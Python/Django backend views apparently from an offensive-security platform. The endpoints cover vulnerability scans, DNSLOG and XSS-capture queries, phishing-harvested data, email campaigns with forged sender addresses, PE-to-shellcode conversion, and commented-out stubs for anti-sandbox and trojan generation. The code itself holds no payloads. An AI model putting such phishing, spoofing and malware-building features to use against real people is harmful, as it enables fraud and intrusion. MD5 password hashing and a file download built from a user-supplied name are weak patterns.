def UpdateShowName(request): #更新显示名字 RequestLogRecord(request, request_api="update_show_name") if request.method == "POST": try: Token = json.loads(request.body)["token"] NewShowName = json.loads(request.body)["new_show_name"] Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="update_show_name", uid=Uid) # 查询到了在计入 UpdateShowNameResult = UserInfo().UpdateShowName( uid=Uid, show_name=NewShowName) #获取值查看是否成功 if UpdateShowNameResult: return JsonResponse({ 'message': '好诶!修改成功~', 'code': 200, }) else: return JsonResponse({ 'message': "输入信息有误重新输入", 'code': 404, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_BasicFunctions_User_UpdateShowName(def)", e) return JsonResponse({ 'message': '自己去看报错日志!', 'code': 169, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def Query(request): #文件接收查询 RequestLogRecord(request, request_api="file_acquisition_query") if request.method == "POST": try: NumberOfPages = json.loads(request.body)["number_of_pages"] UserToken = json.loads(request.body)["token"] Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名 if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="file_acquisition_query", uid=Uid) # 查询到了在计入 if int(NumberOfPages) > 0: Result = FileAcquisitionData().Query( uid=Uid, number_of_pages=int(NumberOfPages)) return JsonResponse({ 'message': Result, 'code': 200, }) else: return JsonResponse({ 'message': "你家页数是负数的????", 'code': 400, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_FileAcquisition_Query_Query(def)", e) return JsonResponse({ 'message': '你不对劲!为什么报错了?', 'code': 169, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def Stop(request):#运行项目 RequestLogRecord(request, request_api="stop_email_project") if request.method == "POST": try: Token=json.loads(request.body)["token"] Key = json.loads(request.body)["project_key"] Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="stop_email_project", uid=Uid) # 查询到了在计入 #结束任务后修改项目状态(结束任务留空) Result=EmailProject().ModifyProjectStatus(uid=Uid,project_key=Key,project_status="0") if Result: return JsonResponse({'message': "项目停止成功!", 'code': 200, }) else: return JsonResponse({'message': "项目停止失败!", 'code': 505, }) else: return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_Email_EmailProject_Stop(def)", e) return JsonResponse({'message': "未知错误,请查看日志(๑•̀ㅂ•́)و✧", 'code': 169, }) else: return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def DownloadWord(request): #下载word报告 # 设置响应文件类型数据的响应头 RequestLogRecord(request, request_api="download_word") if request.method == "POST": try: #传入Sid和Token来进行创建任务 FileName = json.loads(request.body)["file_name"] UserToken = json.loads(request.body)["token"] Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询UID UserOperationLogRecord(request, request_api="download_word", uid=Uid) if Uid != None: # 查到了UID QueryReturnValue = ReportGenerationList().Query( uid=Uid, file_name=FileName) # 查询是否是该用户的 if (QueryReturnValue != None) and (QueryReturnValue != False): file = open( GetDownloadFolderLocation().Result() + FileName, 'rb') response = FileResponse(file) response['Content-Type'] = 'application/octet-stream' response[ 'Content-Disposition'] = 'attachment;filename=' + FileName return response else: return JsonResponse({ 'message': '啊啊啊它不是你的,别瞎搞呀!', 'code': 404, }) except Exception as e: ErrorLog().Write("Web_Api_GenerateReport_GenerateWord(def)", e) return JsonResponse({ 'message': '莎酱被玩坏啦(>^ω^<)喵', 'code': 500, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def NistDataBulkQuery(request):#查询Nist的基础数据监控数据 RequestLogRecord(request, request_api="nist_data_bulk_query") if request.method == "POST": try: Token=json.loads(request.body)["token"] NumberOfPages = json.loads(request.body)["number_of_pages"]#页数 Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="nist_data_bulk_query", uid=Uid) # 查询到了在计入 if int(NumberOfPages)<0: return JsonResponse({'message': "你家有小于0的页码?", 'code': 503, }) else: SearchResult=NistData().BulkQuery(number_of_pages=int(NumberOfPages))#获取数据 return JsonResponse({'message': SearchResult, 'code': 200, }) else: return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_CVE_NistMonitoring_Nist_NistDataBulkQuery(def)", e) return JsonResponse({'message': '自己去看报错日志!', 'code': 169, }) else: return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def DNSQuery(request): # 用于DNS类型的DNSLOG数据查询 RequestLogRecord(request, request_api="domain_name_system_log") if request.method == "POST": try: Key = json.loads(request.body)["key"] NumberOfPages = json.loads(request.body)["number_of_pages"] Uid = UserInfo().QueryUidWithKey(Key) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="domain_name_system_log", uid=Uid) # 查询到了在计入 #通过UID进行获取key DomainNameSystemLogKey = DomainNameSystemLogKeyword().Query( uid=Uid) #获取key DNSKey = DomainNameSystemLogKey + "." + domain_name_system_address #拼接获取该用户的DNSLOG完整值 DomainNameSystemLogResult = DomainNameSystemLog().Query2DNS( key=DNSKey, number_of_pages=int(NumberOfPages)) # 对解析记录进行查询 return JsonResponse({ 'message': DomainNameSystemLogResult, 'code': 200, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_DomainNameSystemLog_Data_DNSQuery(def)", e) return JsonResponse({ 'message': "呐呐呐!莎酱被玩坏啦(>^ω^<)", 'code': 169, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def Scan(request): RequestLogRecord(request, request_api="vulnerability_scanning") if request.method == "POST": try: ReceiveData=json.loads(request.body) ScanUrl=ReceiveData["url"] ScanToken= ReceiveData["token"] ScanModule = ReceiveData["module"] ScanProcess = ReceiveData["process"] ScanHeader = ReceiveData["header"] ScanProxy = ReceiveData["proxy"] if len(ScanProxy)>7:#如果传入的值不为空 ScanProxy=Proxies().result(ScanProxy) else: ScanProxy=proxies if ScanHeader == "": # Headers为空,就使用配置文件中的头 ScanHeader = headers if type(ScanProcess)==int:#判断类型 Uid=UserInfo().QueryUidWithToken(ScanToken)#如果登录成功后就来查询用户名 if Uid!=None: UserOperationLogRecord(request, request_api="vulnerability_scanning", uid=Uid) ActiveScanId=ActiveScanList().Write(uid=Uid,url=ScanUrl,proxy=str(ScanProxy),status=0,module=ScanModule,process=ScanProcess)#写入用户关系表,然后返回sid下发给任务 RedisActiveScanTask= MedusaScan.delay(ScanUrl,ScanModule,ScanProcess,ScanHeader,ScanProxy,Uid,ActiveScanId)#调用扫描处理函数 ActiveScanList().UpdateRedisId(uid=Uid,active_scan_id=ActiveScanId,redis_id=RedisActiveScanTask.task_id) return JsonResponse({'message': '任务下发成功👌', 'code': 200, }) else: return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) else: return JsonResponse({'message': '类型错误!', 'code': 666, }) except Exception as e: ErrorLog().Write("Web_BasicFunctions_VulnerabilityScanning_Scan(def)", e) return JsonResponse({'message': '莎酱被玩坏掉嘞QAQ', 'code': 169, }) else: return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def ActiveScanListQuery(request): #主动扫描列表查询 RequestLogRecord(request, request_api="active_scan_list_query") if request.method == "POST": try: UserToken = json.loads(request.body)["token"] Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名 if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="active_scan_list_query", uid=Uid) ActiveScanListQueryResult = ActiveScanList().Query(uid=Uid) if ActiveScanListQueryResult != None: return JsonResponse({ 'message': ActiveScanListQueryResult, 'code': 200, }) else: return JsonResponse({ 'message': '数据库出问题了🐈', 'code': 404, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write( "Web_BasicFunctions_VulnerabilityQuery_ActiveScanListQuery(def)", e) return JsonResponse({ 'message': '莎酱被玩坏啦(>^ω^<)喵', 'code': 169, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def Login(request): #用户登录,每次登录成功都会刷新一次Token RequestLogRecord(request, request_api="login") if request.method == "POST": try: Username = json.loads(request.body)["username"] Passwd = json.loads(request.body)["passwd"] Md5Passwd = Md5Encryption().Md5Result(Passwd) #对密码加密 UserLogin = UserInfo().UserLogin(Username, Md5Passwd) if UserLogin is None: return JsonResponse({ 'message': '账号或密码错误', 'code': 604, }) else: while True: #如果查询确实冲突了 Token = randoms().result(250) QueryTokenValidity = UserInfo().QueryTokenValidity( Token) #用来查询Token是否冲突了 if not QueryTokenValidity: #如果不冲突的话跳出循环 break UpdateToken = UserInfo().UpdateToken(name=Username, token=Token) #接着更新Token if UpdateToken: #如果更新成功了 Uid = UserInfo().QueryUidWithToken(Token) # 查询UID UserOperationLogRecord(request, request_api="login", uid=Uid) return JsonResponse({ 'message': Token, 'code': 200, }) except Exception as e: ErrorLog().Write("Web_Api_User_LogIn(def)", e) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def HomepageDefaultData(request): #用户登录成功后跳转的首页,默认数据 RequestLogRecord(request, request_api="homepage_default_data") if request.method == "POST": try: UserToken = json.loads(request.body)["token"] Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名 if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="homepage_default_data", uid=Uid) DefaultData = HomeInfo().DefaultData(uid=Uid) if DefaultData == None: return JsonResponse({ 'message': "想啥呢?不知道查询出问题了吗?", 'code': 404, }) else: return JsonResponse({ 'message': DefaultData, 'code': 200, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write( "Web_BasicFunctions_Home_HomepageDefaultData(def)", e) return JsonResponse({ 'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def NistSearchStatistics(request):#模糊搜索数据统计 RequestLogRecord(request, request_api="nist_search_statistics") if request.method == "POST": try: Token=json.loads(request.body)["token"] Severity = json.loads(request.body)["severity"] # 严重性等级 Key = json.loads(request.body)["key"] # 查询关键字 Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="nist_search_statistics", uid=Uid) # 查询到了在计入 if Key=="": return JsonResponse({'message': "咋了?查询不知道传数据吗?", 'code': 505, }) else: Total = NistData().SearchStatistics(key=Key,severity=Severity) # 查询漏洞总数 return JsonResponse({'message': Total, 'code': 200, }) else: return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_CVE_NistMonitoring_Nist_NistSearchStatistics(def)", e) return JsonResponse({'message': '自己去看报错日志!', 'code': 169, }) else: return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def HomepageData(request):#用户登录成功后跳转的首页 RequestLogRecord(request, request_api="homepage_data") if request.method == "POST": try: StartTime = json.loads(request.body)["start_time"] EndTime=json.loads(request.body)["end_time"] UserToken = json.loads(request.body)["token"] if StartTime==None or EndTime==None: return JsonResponse({'message': '小宝贝时间呢?', 'code': 503, }) else: Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名 if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="home", uid=Uid) Home=HomeInfo().Result(uid=Uid, start_time=StartTime,end_time=EndTime) if Home==None: return JsonResponse({'message': "想啥呢?不知道查询出问题了吗?", 'code': 404, }) else: return JsonResponse({'message': Home, 'code': 200, }) except Exception as e: ErrorLog().Write("Web_Api_Home_HomepageData(def)", e) return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, }) else: return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def QueryProjectData(request): # 用来查看用户的XSS项目中的数据 RequestLogRecord(request, request_api="query_cross_site_script_project_data") if request.method == "POST": try: ProjectAssociatedFileName = json.loads(request.body)["project_associated_file_name"] UserToken = json.loads(request.body)["token"] Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名 if Uid != None: # 查到了UID,并且js数据不为空 UserOperationLogRecord(request, request_api="query_cross_site_script_project_data", uid=Uid) AuthorityCheck = CrossSiteScriptProject().AuthorityCheck(uid=Uid,file_name=ProjectAssociatedFileName) # 用来校检CrossSiteScript数据库中文件名和UID相对应 if AuthorityCheck: CrossSiteScriptInfoResult=CrossSiteScriptInfo().Query(project_associated_file_name=ProjectAssociatedFileName)#查询数据库中项目的XSS信息 return JsonResponse({'message': CrossSiteScriptInfoResult, 'code': 200, }) else: return JsonResponse({'message': "你没有查询这个项目的权限哦宝贝~", 'code': 404, }) else: return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_CrossSiteScriptHub_CrossSiteScript_QueryProjectData(def)", e) return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, }) else: return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def Config(request): #获取版本等信息 RequestLogRecord(request, request_api="medusa_info") if request.method == "POST": try: UserToken = json.loads(request.body)["token"] Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名 if Uid != None: # 查到了UID UserOperationLogRecord( request, request_api="delete_cross_site_script_project", uid=Uid) if config.cross_site_script_uses_domain_names != "127.0.0.1:1234": info["cross_site_script_uses_domain_names"]["state"] = True if config.domain_name_system_address != "dnslog.ascotbe.com": info["domain_name_system_address"]["state"] = True if config.local_mail_host != "smtp.ascotbe.com": info["local_mail_host"]["state"] = True return JsonResponse({ 'message': info, 'code': 200, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_BasicFunctions_Information_Config(def)", e) return JsonResponse({ 'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def StatisticalCrossSiteScriptProject(request): #统计项目个数 RequestLogRecord(request, request_api="statistical_cross_site_script_project") if request.method == "POST": try: Token = json.loads(request.body)["token"] Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord( request, request_api="statistical_cross_site_script_project", uid=Uid) Number = CrossSiteScriptProject().QueryStatistics( uid=Uid) #获取当前用户的个数 return JsonResponse({ 'message': Number, 'code': 200, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write( "Web_CrossSiteScriptHub_CrossSiteScript_StatisticalCrossSiteScriptProject(def)", e) return JsonResponse({ 'message': "呐呐呐!莎酱被玩坏啦(>^ω^<)", 'code': 169, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def JoinMarkdownProject(request):#通过邀请码加入项目 RequestLogRecord(request, request_api="join_markdown_project") if request.method == "POST": try: UserToken = json.loads(request.body)["token"] MarkdownProjectInvitationCode = json.loads(request.body)["markdown_project_invitation_code"]#传入邀请码 Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名 if len(MarkdownProjectInvitationCode)==50:#判断邀请码的长度是否为50 if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="join_markdown_project", uid=Uid) #通过邀请码查询信息后写入到数据库中 ProjectInformation=MarkdownRelationship().InvitationCodeToQueryProjectInformation(markdown_project_invitation_code=MarkdownProjectInvitationCode)[0]#返回项目信息 if ProjectInformation!=None:#判断是否为空,也就是说查不到内容,或者报错了 if Uid!=ProjectInformation["uid"]:#判断是否是自己邀请自己 #还需要一个判断是否已经加入项目 if MarkdownRelationship().DetectionOfRepeatedAddition(markdown_name=ProjectInformation["markdown_name"],uid=Uid):#判断是否已经加入了 return JsonResponse({'message': "你已经加入过项目啦~拉卡拉卡~", 'code': 502, }) else: MarkdownRelationship().Write(markdown_name=ProjectInformation["markdown_name"], uid=Uid, markdown_project_name=ProjectInformation["markdown_project_name"], markdown_project_owner="0", markdown_project_invitation_code="") return JsonResponse({'message': "加入项目成功啦~咕噜咕噜~", 'code': 200, }) else: return JsonResponse({'message': "这就是你的项目,瞎鸡儿加个啥", 'code': 503, }) else: return JsonResponse({'message': "小宝贝不要调皮哦(⊙x⊙;)", 'code': 404, }) else: return JsonResponse({'message': "小宝贝这是非法操作哦(๑•̀ㅂ•́)و✧", 'code': 403, }) else: return JsonResponse({'message': "小宝贝邀请码的长度不合规哦Σ(っ °Д °;)っ", 'code': 501, }) except Exception as e: ErrorLog().Write("Web_CollaborationPlatform_Markdown_JoinMarkdownProject(def)", e) return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, }) else: return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def PersonalInformation(request): #用户个人信息 RequestLogRecord(request, request_api="personal_information") if request.method == "POST": try: Token = json.loads(request.body)["token"] Info = UserInfo().QueryUserInfo(Token) Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询用户名 if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="personal_information", uid=Uid) if Info is None: return JsonResponse({ 'message': '搁着闹呢?', 'code': 404, }) elif Info != None: JsonValues = {} #对数据进行二次处理 JsonValues["id"] = Info["id"] JsonValues["key"] = Info["key"] JsonValues["name"] = Info["name"] JsonValues["token"] = Info["token"] JsonValues["show_name"] = Info["show_name"] JsonValues["email"] = Info["email"] JsonValues["img_path"] = Info["img_path"] return JsonResponse({ 'message': JsonValues, 'code': 200, }) except Exception as e: ErrorLog().Write("Web_Api_UserInfo_PersonalInformation(def)", e) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def FishingDataDetails(request): #钓鱼获取的数据详情 RequestLogRecord(request, request_api="fishing_data_details") if request.method == "POST": try: Token = json.loads(request.body)["token"] RequestKey = json.loads(request.body)["request_key"] NumberOfPages = json.loads(request.body)["number_of_pages"] Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="fishing_data_details", uid=Uid) # 查询到了在计入 if int(NumberOfPages) > 0: Result = FishingData().Query( request_key=RequestKey, number_of_pages=int(NumberOfPages)) return JsonResponse({ 'message': Result, 'code': 200, }) else: return JsonResponse({ 'message': "你家页数是负数的????", 'code': 400, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_Mail_FishingData_FishingDataDetails(def)", e) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def QueryProject(request): #用来查看用户的XSS项目 RequestLogRecord(request, request_api="query_cross_site_script_project") if request.method == "POST": try: UserToken = json.loads(request.body)["token"] NumberOfPages = json.loads(request.body)["number_of_pages"] Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名 if Uid != None: # 查到了UID UserOperationLogRecord( request, request_api="query_cross_site_script_project", uid=Uid) CrossSiteScriptProjectResult = CrossSiteScriptProject().Query( uid=Uid, number_of_pages=int(NumberOfPages)) # 查询项目信息 return JsonResponse({ 'message': CrossSiteScriptProjectResult, 'code': 200, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write( "Web_CrossSiteScriptHub_CrossSiteScript_QueryProject(def)", e) return JsonResponse({ 'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def EmailAttachmentQuery(request): #查询附件文件 RequestLogRecord(request, request_api="email_attachment_query") if request.method == "POST": try: Token = json.loads(request.body)["token"] NumberOfPages = json.loads(request.body)["number_of_pages"] Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="email_attachment_query", uid=Uid) # 查询到了在计入 if int(NumberOfPages) > 0: EmailAttachmentQueryResult = MailAttachment().Query( uid=Uid, number_of_pages=int(NumberOfPages)) return JsonResponse({ 'message': EmailAttachmentQueryResult, 'code': 200, }) else: return JsonResponse({ 'message': "你家页数是负数的????", 'code': 400, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write( "Web_Mail_MailAttachment_EmailAttachmentQuery(def)", e) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def GenerateWord(request):#生成word文档报告 RequestLogRecord(request, request_api="generate_word") if request.method == "POST": try: #传入Sid和Token来进行创建任务 ActiveScanId=json.loads(request.body)["active_scan_id"] UserToken=json.loads(request.body)["token"] Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名 if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="generate_word", uid=Uid)#查询到了在计入 VulnerabilityDataList,Url = MedusaQuery().QueryBySid(active_scan_id=ActiveScanId,uid=Uid)#查询漏洞列表和URL WordDownloadFileName=GenerateWordReport(VulnerabilityDataList=VulnerabilityDataList,target_url=Url) if WordDownloadFileName != None: ReportGenerationList().Write(active_scan_id=ActiveScanId,uid=Uid,file_name=WordDownloadFileName)#把相关数据写到数据库中 return JsonResponse({'message': WordDownloadFileName, 'code': 200, }) else: return JsonResponse({'message': '莎酱生不出小莎酱惹QAQ', 'code': 404, }) else: return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_BasicFunctions_GenerateReport_GenerateWord(def)", e) return JsonResponse({'message': '莎酱被玩坏啦(>^ω^<)喵', 'code': 169, }) else: return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def HTTPStatistics(request): #对DNS类型数据进行统计 RequestLogRecord(request, request_api="http_domain_name_system_log_statistics") if request.method == "POST": try: Token = json.loads(request.body)["token"] Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord( request, request_api="http_domain_name_system_log_statistics", uid=Uid) # 查询到了在计入 Result = DomainNameSystemLog().Statistical2HTTP() # 统计的个数 return JsonResponse({ 'message': Result, 'code': 200, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write( "Web_DomainNameSystemLog_Data_HTTPStatistics(def)", e) return JsonResponse({ 'message': "呐呐呐!莎酱被玩坏啦(>^ω^<)", 'code': 169, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def Details(request):#查询邮件详情 RequestLogRecord(request, request_api="email_project_details") if request.method == "POST": try: Token=json.loads(request.body)["token"] Key = json.loads(request.body)["project_key"] Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="email_project_details", uid=Uid) # 查询到了在计入 Result=EmailProject().Query(uid=Uid,project_key=Key) JsonValues={} JsonValues["goal_mailbox"] = ast.literal_eval(Result[2]) JsonValues["end_time"] = Result[3] JsonValues["project_key"] = Result[4] JsonValues["project_name"] = Result[5] JsonValues["mail_message"] = Result[6] JsonValues["attachment"] = ast.literal_eval(Result[7]) JsonValues["image"] = ast.literal_eval(Result[8]) JsonValues["mail_title"] = Result[9] JsonValues["sender"] = Result[10] JsonValues["forged_address"] = Result[11] JsonValues["redis_id"] = Result[12] JsonValues["compilation_status"] = Result[13] JsonValues["interval"] = Result[14] JsonValues["project_status"] = Result[15] JsonValues["creation_time "] = Result[16] return JsonResponse({'message': JsonValues, 'code': 200, }) else: return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_Email_EmailProject_Details(def)", e) return JsonResponse({'message': "未知错误,请查看日志(๑•̀ㅂ•́)و✧", 'code': 169, }) else: return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def MedusaValueQuery(request): #查询单个漏洞 RequestLogRecord(request, request_api="medusa_value_query") if request.method == "POST": try: UserToken = json.loads(request.body)["token"] Ssid = json.loads(request.body)["ssid"] UserName = UserInfo().QueryUserNameWithToken( UserToken) # 如果登录成功后就来查询用户名 UserOperationLogRecord(request, request_api="medusa_value_query", uid=UserName) if UserName != None: # 查到了UID MedusaQueryResult = MedusaQuery().Query(uid=UserName, ssid=Ssid) if MedusaQueryResult != None: return JsonResponse({ 'message': MedusaQueryResult, 'code': 200, }) else: return JsonResponse({ 'message': '数据库出问题了🐈', 'code': 404, }) except Exception as e: ErrorLog().Write( "Web_Api_VulnerabilityQuery_MedusaValueQuery(def)", e) return JsonResponse({ 'message': '莎酱被玩坏啦ヾ(=・ω・=)o', 'code': 500, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def ScanInformationQuery(request): #查询关系表 RequestLogRecord(request, request_api="scan_information_query") if request.method == "POST": try: UserToken = json.loads(request.body)["token"] Sid = json.loads(request.body)["sid"] UserName = UserInfo().QueryUserNameWithToken( UserToken) # 如果登录成功后就来查询用户名 UserOperationLogRecord(request, request_api="scan_information_query", uid=UserName) if UserName != None: # 查到了UID MedusaQueryResult = ScanInformation().Query(uid=UserName, sid=Sid) if MedusaQueryResult != None: return JsonResponse({ 'message': MedusaQueryResult, 'code': 200, }) else: return JsonResponse({ 'message': '数据库出问题了🐈', 'code': 404, }) except Exception as e: ErrorLog().Write( "Web_Api_VulnerabilityQuery_ScanInformationQuery(def)", e) return JsonResponse({ 'message': '莎酱被玩坏啦ヽ(・ω・´メ)', 'code': 500, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def PE2Shellcode(request): #PE文件转换成Shellcode RequestLogRecord(request, request_api="pe2shellcode") if request.method == "POST": try: Token = request.headers["token"] Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="pe2shellcode", uid=Uid) PictureData = request.FILES.get('file', None) #获取文件数据 PictureName = PictureData.name # 获取文件名 if 0 < PictureData.size: #内容不能为空 SaveFileName = randoms().result(5) + str(int( time.time())) #重命名文件 SaveRoute = PortableExecutableFilePath().Result( ) + SaveFileName #获得保存路径 ShellcodeFileName = randoms().result(5) + str( int(time.time())) #获取shellcode文件随机名 with open(SaveRoute, 'wb') as f: for line in PictureData: f.write(line) RedisTask = CompilePortableExecutableFile.delay( shellcode_file_name=ShellcodeFileName, file_name=SaveFileName) #异步执行 PortableExecutable2Shellcode().Write( original_file_name=PictureName, shellcode_file_name=ShellcodeFileName, redis_id=RedisTask.task_id, file_name=SaveFileName, uid=Uid) return JsonResponse({ 'message': "任务下发成功(๑•̀ㅂ•́)و✧", 'code': 200, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write( "Web_TrojanOrVirus_TrojanInterface_PE2Shellcode(def)", e) return JsonResponse({ 'message': "呐呐呐!莎酱被玩坏啦(>^ω^<)", 'code': 169, }) else: return JsonResponse({ 'message': '请使用POST请求', 'code': 500, }) # """get_anti_sandbox # { # "token": "xxx" # } # """ # import importlib # def GetAntiSandbox(request):#获取反沙箱方式 # RequestLogRecord(request, request_api="get_anti_sandbox") # if request.method == "POST": # try: # Token=json.loads(request.body)["token"] # Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID # if Uid != None: # 查到了UID # UserOperationLogRecord(request, request_api="get_anti_sandbox", uid=Uid) # return JsonResponse({'message': AntiSandbox().__Method__, 'code': 200, }) # else: # return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) # except Exception as e: # ErrorLog().Write("Web_TrojanOrVirus_TrojanInterface_GetAntiSandbox(def)", e) # return JsonResponse({'message': "呐呐呐!莎酱被玩坏啦(>^ω^<)", 'code': 169, }) # # else: # return JsonResponse({'message': '请使用Post请求', 'code': 500, }) # # """get_auto_start # { # "token": "xxx" # } # """ # def GetAutoStart(request):#获取反沙箱方式 # RequestLogRecord(request, request_api="get_auto_start") # if request.method == "POST": # try: # Token=json.loads(request.body)["token"] # Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID # if Uid != None: # 查到了UID # UserOperationLogRecord(request, request_api="get_auto_start", uid=Uid) # return JsonResponse({'message': AutoStart().__Method__, 'code': 200, }) # else: # return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) # except Exception as e: # ErrorLog().Write("Web_TrojanOrVirus_TrojanInterface_GetAutoStart(def)", e) # return JsonResponse({'message': "呐呐呐!莎酱被玩坏啦(>^ω^<)", 'code': 169, }) # # else: # return JsonResponse({'message': '请使用Post请求', 'code': 500, }) # # def ShellcodeToTrojan(request):#shellcode转换生成病毒 # RequestLogRecord(request, request_api="shellcode_to_trojan") # if request.method == "POST": # try: # 